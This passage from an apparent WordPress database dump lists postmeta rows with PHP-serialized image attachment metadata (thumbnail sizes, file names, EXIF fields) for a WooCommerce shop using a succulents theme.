2:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1452174818\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11871,4670,'_thumbnail_id','4910'),(11877,4911,'_wp_attached_file','2020/04/1.jpg'),(11878,4911,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:13:\"2020/04/1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"1-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"1-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1519114722\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11879,4912,'_wp_attached_file','2020/04/2-1.jpg'),(11880,4912,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:15:\"2020/04/2-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"2-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"2-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:15:\"2-1-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:15:\"2-1-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:15:\"2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"2-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1451981242\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11881,4913,'_wp_attached_file','2020/04/3.jpg'),(11882,4913,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:13:\"2020/04/3.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"3-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"3-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431337320\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11883,4914,'_wp_attached_file','2020/04/4.jpg'),(11884,4914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:879;s:4:\"file\";s:13:\"2020/04/4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"4-600x599.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x767.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"4-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"4-550x879.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:879;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"4-600x599.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1518506634\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11885,4915,'_wp_attached_file','2020/04/5.jpg'),(11886,4915,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:571;s:4:\"file\";s:13:\"2020/04/5.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"5-600x389.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"5-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"5-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"5-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"5-550x571.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:571;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"5-600x389.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11887,4916,'_wp_attached_file','2020/04/6.jpg'),(11888,4916,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:588;s:4:\"file\";s:13:\"2020/04/6.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"6-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"6-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"6-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"6-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"6-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"6-550x588.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"6-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1506667174\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11889,4917,'_wp_attached_file','2020/04/7.jpg'),(11890,4917,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:13:\"2020/04/7.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"7-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"7-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"7-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"7-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"7-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1519704455\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11893,4672,'_thumbnail_id','4914'),(11897,4678,'_thumbnail_id','4913'),(11902,4680,'_thumbnail_id','4912'),(11907,4682,'_thumbnail_id','4911'),(11912,4685,'_thumbnail_id','4917'),(11916,4921,'_wp_attached_file','2020/04/Logo-New-TR-web-2.jpg'),(11917,4921,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1223;s:6:\"height\";i:360;s:4:\"file\";s:29:\"2020/04/Logo-New-TR-web-2.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-2-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-2-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-2-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-2-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"m